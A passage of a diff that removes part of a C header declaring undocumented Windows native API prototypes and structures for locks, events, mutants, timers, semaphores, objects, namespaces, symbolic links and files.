-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlTryAcquireSRWLockExclusive(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlTryAcquireSRWLockShared(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlAcquireReleaseSRWLockExclusive(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlUpdateClonedSRWLock(
- _Inout_ PRTL_SRWLOCK SRWLock,
- _In_ LOGICAL Shared);
-
-/************************************************************************************
-*
-* RTL UAC Support API.
-*
-************************************************************************************/
-
-#define DBG_FLAG_ELEVATION_ENABLED 1
-#define DBG_FLAG_VIRTUALIZATION_ENABLED 2
-#define DBG_FLAG_INSTALLER_DETECT_ENABLED 3
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlQueryElevationFlags(
- _Inout_ ULONG *ElevationFlags);
-
-/************************************************************************************
-*
-* RTL Misc Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlDoesFileExists_U(
- _In_ PCWSTR FileName);
-
-/************************************************************************************
-*
-* RTL Boundary Descriptor API.
-*
-************************************************************************************/
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlCreateBoundaryDescriptor(
- _In_ PUNICODE_STRING Name,
- _In_ ULONG Flags);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlDeleteBoundaryDescriptor(
- _In_ PVOID BoundaryDescriptor);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddSIDToBoundaryDescriptor(
- _Inout_ PVOID *BoundaryDescriptor,
- _In_ PSID RequiredSid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddIntegrityLabelToBoundaryDescriptor(
- _Inout_ PVOID *BoundaryDescriptor,
- _In_ PSID IntegrityLabel);
-
-/************************************************************************************
-*
-* ETW API.
-*
-************************************************************************************/
-
-struct _EVENT_FILTER_DESCRIPTOR;
-
-typedef VOID(NTAPI *PENABLECALLBACK)(
- _In_ LPCGUID SourceId,
- _In_ ULONG IsEnabled,
- _In_ UCHAR Level,
- _In_ ULONGLONG MatchAnyKeyword,
- _In_ ULONGLONG MatchAllKeyword,
- _In_opt_ struct _EVENT_FILTER_DESCRIPTOR *FilterData,
- _Inout_opt_ PVOID CallbackContext
- );
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-EtwEventRegister(
- _In_ LPCGUID ProviderId,
- _In_opt_ PENABLECALLBACK EnableCallback,
- _In_opt_ PVOID CallbackContext,
- _Out_ PREGHANDLE RegHandle);
-
-/*
-** Runtime Library API END
-*/
-
-/*
-** Native API START
-*/
-
-/************************************************************************************
-*
-* System Information API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-WINAPI
-NtQuerySystemInformation(
- _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
- _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
- _In_ ULONG SystemInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySystemInformationEx(
- _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
- _In_reads_bytes_(InputBufferLength) PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
- _In_ ULONG SystemInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetSystemInformation(
- _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
- _In_reads_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
- _In_ ULONG SystemInformationLength);
-
-/************************************************************************************
-*
-* Event (EventPair) API.
-*
-************************************************************************************/
-
-typedef enum _EVENT_INFORMATION_CLASS {
- EventBasicInformation
-} EVENT_INFORMATION_CLASS;
-
-typedef enum _EVENT_TYPE {
- NotificationEvent,
- SynchronizationEvent
-} EVENT_TYPE;
-
-typedef struct _EVENT_BASIC_INFORMATION {
- EVENT_TYPE EventType;
- LONG EventState;
-} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateEvent(
- _Out_ PHANDLE EventHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ EVENT_TYPE EventType,
- _In_ BOOLEAN InitialState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenEvent(
- _Out_ PHANDLE EventHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetEvent(
- _In_ HANDLE EventHandle,
- _Out_opt_ PLONG PreviousState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtClearEvent(
- _In_ HANDLE EventHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtResetEvent(
- _In_ HANDLE EventHandle,
- _Out_opt_ PLONG PreviousState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtPulseEvent(
- _In_ HANDLE EventHandle,
- _Out_opt_ PLONG PreviousState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenKeyedEvent(
- _Out_ PHANDLE KeyedEventHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryEvent(
- _In_ HANDLE EventHandle,
- _In_ EVENT_INFORMATION_CLASS EventInformationClass,
- _Out_writes_bytes_(EventInformationLength) PVOID EventInformation,
- _In_ ULONG EventInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateEventPair(
- _Out_ PHANDLE EventPairHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenEventPair(
- _Out_ PHANDLE EventPairHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetLowEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetHighEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWaitLowEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWaitHighEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetLowWaitHighEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetHighWaitLowEventPair(
- _In_ HANDLE EventPairHandle);
-
-/************************************************************************************
-*
-* Mutant API.
-*
-************************************************************************************/
-
-typedef enum _MUTANT_INFORMATION_CLASS {
- MutantBasicInformation,
- MutantOwnerInformation
-} MUTANT_INFORMATION_CLASS;
-
-typedef struct _MUTANT_BASIC_INFORMATION {
- LONG CurrentCount;
- BOOLEAN OwnedByCaller;
- BOOLEAN AbandonedState;
-} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;
-
-typedef struct _MUTANT_OWNER_INFORMATION {
- CLIENT_ID ClientId;
-} MUTANT_OWNER_INFORMATION, *PMUTANT_OWNER_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateMutant(
- _Out_ PHANDLE MutantHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ BOOLEAN InitialOwner);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenMutant(
- _Out_ PHANDLE MutantHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryMutant(
- _In_ HANDLE MutantHandle,
- _In_ MUTANT_INFORMATION_CLASS MutantInformationClass,
- _Out_writes_bytes_(MutantInformationLength) PVOID MutantInformation,
- _In_ ULONG MutantInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReleaseMutant(
- _In_ HANDLE MutantHandle,
- _Out_opt_ PLONG PreviousCount);
-
-/************************************************************************************
-*
-* Timer API.
-*
-************************************************************************************/
-
-typedef VOID(*PTIMER_APC_ROUTINE) (
- _In_ PVOID TimerContext,
- _In_ ULONG TimerLowValue,
- _In_ LONG TimerHighValue
- );
-
-typedef enum _TIMER_TYPE {
- NotificationTimer,
- SynchronizationTimer
-} TIMER_TYPE;
-
-typedef enum _TIMER_INFORMATION_CLASS {
- TimerBasicInformation
-} TIMER_INFORMATION_CLASS;
-
-typedef struct _TIMER_BASIC_INFORMATION {
- LARGE_INTEGER RemainingTime;
- BOOLEAN TimerState;
-} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;
-
-typedef enum _TIMER_SET_INFORMATION_CLASS {
- TimerSetCoalescableTimer,
- MaxTimerInfoClass
-} TIMER_SET_INFORMATION_CLASS;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateTimer(
- _In_ PHANDLE TimerHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ TIMER_TYPE TimerType);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetTimer(
- _In_ HANDLE TimerHandle,
- _In_ PLARGE_INTEGER DueTime,
- _In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine,
- _In_opt_ PVOID TimerContext,
- _In_ BOOLEAN WakeTimer,
- _In_opt_ LONG Period,
- _Out_opt_ PBOOLEAN PreviousState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetTimerEx(
- _In_ HANDLE TimerHandle,
- _In_ TIMER_SET_INFORMATION_CLASS TimerSetInformationClass,
- _Inout_updates_bytes_opt_(TimerSetInformationLength) PVOID TimerSetInformation,
- _In_ ULONG TimerSetInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenTimer(
- _In_ PHANDLE TimerHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryTimer(
- _In_ HANDLE TimerHandle,
- _In_ TIMER_INFORMATION_CLASS TimerInformationClass,
- _Out_writes_bytes_(TimerInformationLength) PVOID TimerInformation,
- _In_ ULONG TimerInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCancelTimer(
- _In_ HANDLE TimerHandle,
- _Out_opt_ PBOOLEAN CurrentState);
-
-//ref from ph2
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateIRTimer(
- _Out_ PHANDLE TimerHandle,
- _In_ ACCESS_MASK DesiredAccess);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetIRTimer(
- _In_ HANDLE TimerHandle,
- _In_opt_ PLARGE_INTEGER DueTime);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateTimer2(
- _Out_ PHANDLE TimerHandle,
- _In_opt_ PVOID Reserved1,
- _In_opt_ PVOID Reserved2,
- _In_ ULONG Attributes,
- _In_ ACCESS_MASK DesiredAccess);
-
-/************************************************************************************
-*
-* Semaphore API.
-*
-************************************************************************************/
-
-typedef enum _SEMAPHORE_INFORMATION_CLASS {
- SemaphoreBasicInformation
-} SEMAPHORE_INFORMATION_CLASS;
-
-typedef struct _SEMAPHORE_BASIC_INFORMATION {
- LONG CurrentCount;
- LONG MaximumCount;
-} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateSemaphore(
- _Out_ PHANDLE SemaphoreHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ LONG InitialCount,
- _In_ LONG MaximumCount);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenSemaphore(
- _Out_ PHANDLE SemaphoreHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySemaphore(
- _In_ HANDLE SemaphoreHandle,
- _In_ SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,
- _Out_writes_bytes_(SemaphoreInformationLength) PVOID SemaphoreInformation,
- _In_ ULONG SemaphoreInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReleaseSemaphore(
- _In_ HANDLE SemaphoreHandle,
- _In_ LONG ReleaseCount,
- _Out_opt_ PLONG PreviousCount);
-
-/************************************************************************************
-*
-* Object and Handle API.
-*
-************************************************************************************/
-typedef enum _OBJECT_INFORMATION_CLASS {
- ObjectBasicInformation,
- ObjectNameInformation,
- ObjectTypeInformation,
- ObjectTypesInformation,
- ObjectHandleFlagInformation,
- ObjectSessionInformation,
- ObjectSessionObjectInformation,
- MaxObjectInfoClass
-} OBJECT_INFORMATION_CLASS;
-
-typedef struct _OBJECT_DIRECTORY_INFORMATION {
- UNICODE_STRING Name;
- UNICODE_STRING TypeName;
-} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;
-
-typedef struct _OBJECT_BASIC_INFORMATION {
- ULONG Attributes;
- ACCESS_MASK GrantedAccess;
- ULONG HandleCount;
- ULONG PointerCount;
- ULONG PagedPoolCharge;
- ULONG NonPagedPoolCharge;
- ULONG Reserved[3];
- ULONG NameInfoSize;
- ULONG TypeInfoSize;
- ULONG SecurityDescriptorSize;
- LARGE_INTEGER CreationTime;
-} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;
-
-typedef struct _OBJECT_NAME_INFORMATION {
- UNICODE_STRING Name;
-} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;
-
-typedef struct _OBJECT_TYPE_INFORMATION {
- UNICODE_STRING TypeName;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG TotalPagedPoolUsage;
- ULONG TotalNonPagedPoolUsage;
- ULONG TotalNamePoolUsage;
- ULONG TotalHandleTableUsage;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- ULONG HighWaterPagedPoolUsage;
- ULONG HighWaterNonPagedPoolUsage;
- ULONG HighWaterNamePoolUsage;
- ULONG HighWaterHandleTableUsage;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- BOOLEAN SecurityRequired;
- BOOLEAN MaintainHandleCount;
- ULONG PoolType;
- ULONG DefaultPagedPoolCharge;
- ULONG DefaultNonPagedPoolCharge;
-} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;
-
-typedef struct _OBJECT_TYPE_INFORMATION_V2 {
- UNICODE_STRING TypeName;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG TotalPagedPoolUsage;
- ULONG TotalNonPagedPoolUsage;
- ULONG TotalNamePoolUsage;
- ULONG TotalHandleTableUsage;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- ULONG HighWaterPagedPoolUsage;
- ULONG HighWaterNonPagedPoolUsage;
- ULONG HighWaterNamePoolUsage;
- ULONG HighWaterHandleTableUsage;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- BOOLEAN SecurityRequired;
- BOOLEAN MaintainHandleCount;
- UCHAR TypeIndex;
- CHAR ReservedByte;
- ULONG PoolType;
- ULONG DefaultPagedPoolCharge;
- ULONG DefaultNonPagedPoolCharge;
-} OBJECT_TYPE_INFORMATION_V2, *POBJECT_TYPE_INFORMATION_V2;
-
-typedef struct _OBJECT_TYPES_INFORMATION {
- ULONG NumberOfTypes;
-} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;
-
-#define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\
- RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR))
-
-#define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\
- RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \
- ALIGN_UP(ObjectType->TypeName.MaximumLength, ULONG_PTR))
-
-typedef struct _OBJECT_HANDLE_FLAG_INFORMATION {
- BOOLEAN Inherit;
- BOOLEAN ProtectFromClose;
-} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtClose(
- _In_ HANDLE Handle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDuplicateObject(
- _In_ HANDLE SourceProcessHandle,
- _In_ HANDLE SourceHandle,
- _In_opt_ HANDLE TargetProcessHandle,
- _Out_ PHANDLE TargetHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ ULONG HandleAttributes,
- _In_ ULONG Options);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtMakePermanentObject(
- _In_ HANDLE Handle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtMakeTemporaryObject(
- _In_ HANDLE Handle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetSecurityObject(
- _In_ HANDLE Handle,
- _In_ SECURITY_INFORMATION SecurityInformation,
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySecurityObject(
- _In_ HANDLE Handle,
- _In_ SECURITY_INFORMATION SecurityInformation,
- _Out_writes_bytes_opt_(Length) PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_ ULONG Length,
- _Out_ PULONG LengthNeeded);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCompareObjects(
- _In_ HANDLE FirstObjectHandle,
- _In_ HANDLE SecondObjectHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryObject(
- _In_opt_ HANDLE Handle,
- _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
- _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation,
- _In_ ULONG ObjectInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationObject(
- _In_ HANDLE Handle,
- _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
- _In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation,
- _In_ ULONG ObjectInformationLength);
-
-typedef enum _WAIT_TYPE {
- WaitAll,
- WaitAny,
- WaitNotification
-} WAIT_TYPE;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWaitForSingleObject(
- _In_ HANDLE Handle,
- _In_ BOOLEAN Alertable,
- _In_opt_ PLARGE_INTEGER Timeout);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWaitForMultipleObjects(
- _In_ ULONG Count,
- _In_reads_(Count) HANDLE Handles[],
- _In_ WAIT_TYPE WaitType,
- _In_ BOOLEAN Alertable,
- _In_opt_ PLARGE_INTEGER Timeout);
-
-/************************************************************************************
-*
-* Directory Object API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateDirectoryObject(
- _Out_ PHANDLE DirectoryHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateDirectoryObjectEx(
- _Out_ PHANDLE DirectoryHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE ShadowDirectoryHandle,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenDirectoryObject(
- _Out_ PHANDLE DirectoryHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryDirectoryObject(
- _In_ HANDLE DirectoryHandle,
- _Out_writes_bytes_opt_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_ BOOLEAN ReturnSingleEntry,
- _In_ BOOLEAN RestartScan,
- _Inout_ PULONG Context,
- _Out_opt_ PULONG ReturnLength);
-
-/************************************************************************************
-*
-* Private Namespace API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreatePrivateNamespace(
- _Out_ PHANDLE NamespaceHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ PVOID BoundaryDescriptor);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenPrivateNamespace(
- _Out_ PHANDLE NamespaceHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ PVOID BoundaryDescriptor);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDeletePrivateNamespace(
- _In_ HANDLE NamespaceHandle);
-
-/************************************************************************************
-*
-* Symbolic Link API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateSymbolicLinkObject(
- _Out_ PHANDLE LinkHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ PUNICODE_STRING LinkTarget);
-
-NTSYSAPI
-NTSTATUS
-WINAPI
-NtOpenSymbolicLinkObject(
- _Out_ PHANDLE LinkHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySymbolicLinkObject(
- _In_ HANDLE LinkHandle,
- _Inout_ PUNICODE_STRING LinkTarget,
- _Out_opt_ PULONG ReturnedLength);
-
-/************************************************************************************
-*
-* File API (+Driver&HotPatch).
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateFile(
- _Out_ PHANDLE FileHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_opt_ PLARGE_INTEGER AllocationSize,
- _In_ ULONG FileAttributes,
- _In_ ULONG ShareAccess,
- _In_ ULONG CreateDisposition,
- _In_ ULONG CreateOptions,
- _In_reads_bytes_opt_(EaLength) PVOID EaBuffer,
- _In_ ULONG EaLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateNamedPipeFile(
- _Out_ PHANDLE FileHandle,
- _In_ ULONG DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG ShareAccess,
- _In_ ULONG CreateDisposition,
- _In_ ULONG CreateOptions,
- _In_ ULONG NamedPipeType,
- _In_ ULONG ReadMode,
- _In_ ULONG CompletionMode,
- _In_ ULONG MaximumInstances,
- _In_ ULONG InboundQuota,
- _In_ ULONG OutboundQuota,
- _In_opt_ PLARGE_INTEGER DefaultTimeout);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateMailslotFile(
- _Out_ PHANDLE FileHandle,
- _In_ ULONG DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG CreateOptions,
- _In_ ULONG MailslotQuota,
- _In_ ULONG MaximumMessageSize,
- _In_ PLARGE_INTEGER ReadTimeout);
-
-NTSYSCALLAPI
-NTSTATUS
-NTAPI
-NtDeviceIoControlFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG IoControlCode,
- _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
- _In_ ULONG OutputBufferLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFsControlFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG FsControlCode,
- _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
- _In_ ULONG OutputBufferLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenFile(
- _Out_ PHANDLE FileHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG ShareAccess,
- _In_ ULONG OpenOptions);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReadFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_opt_ PLARGE_INTEGER ByteOffset,
- _In_opt_ PULONG Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWriteFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_reads_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_opt_ PLARGE_INTEGER ByteOffset,
- _In_opt_ PULONG Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLockFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ PLARGE_INTEGER ByteOffset,
- _In_ PLARGE_INTEGER Length,
- _In_ ULONG Key,
- _In_ BOOLEAN FailImmediately,
- _In_ BOOLEAN ExclusiveLock);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtUnlockFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ PLARGE_INTEGER ByteOffset,
- _In_ PLARGE_INTEGER Length,
- _In_ ULONG Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFlushBuffersFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ PVOID FileInformation,
- _In_ ULONG Length,
- _In_ FILE_INFORMATION_CLASS FileInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDeleteFile(
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryInformationFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID FileInformation,
- _In_ ULONG Length,
- _In_ FILE_INFORMATION_CLASS FileInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryFullAttributesFile(
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PFILE_NETWORK_OPEN_INFORMATION FileInformation);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryDirectoryFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID FileInformation,
- _In_ ULONG Length,
- _In_ FILE_INFORMATION_CLASS FileInformationClass,
- _In_ BOOLEAN ReturnSingleEntry,
- _In_opt_ PUNICODE_STRING FileName,
- _In_ BOOLEAN RestartScan);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryEaFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_ BOOLEAN ReturnSingleEntry,
- _In_reads_bytes_opt_(EaListLength) PVOID EaList,
- _In_ ULONG EaListLength,
- _In_opt_ PULONG EaIndex,
- _In_ BOOLEAN RestartScan);
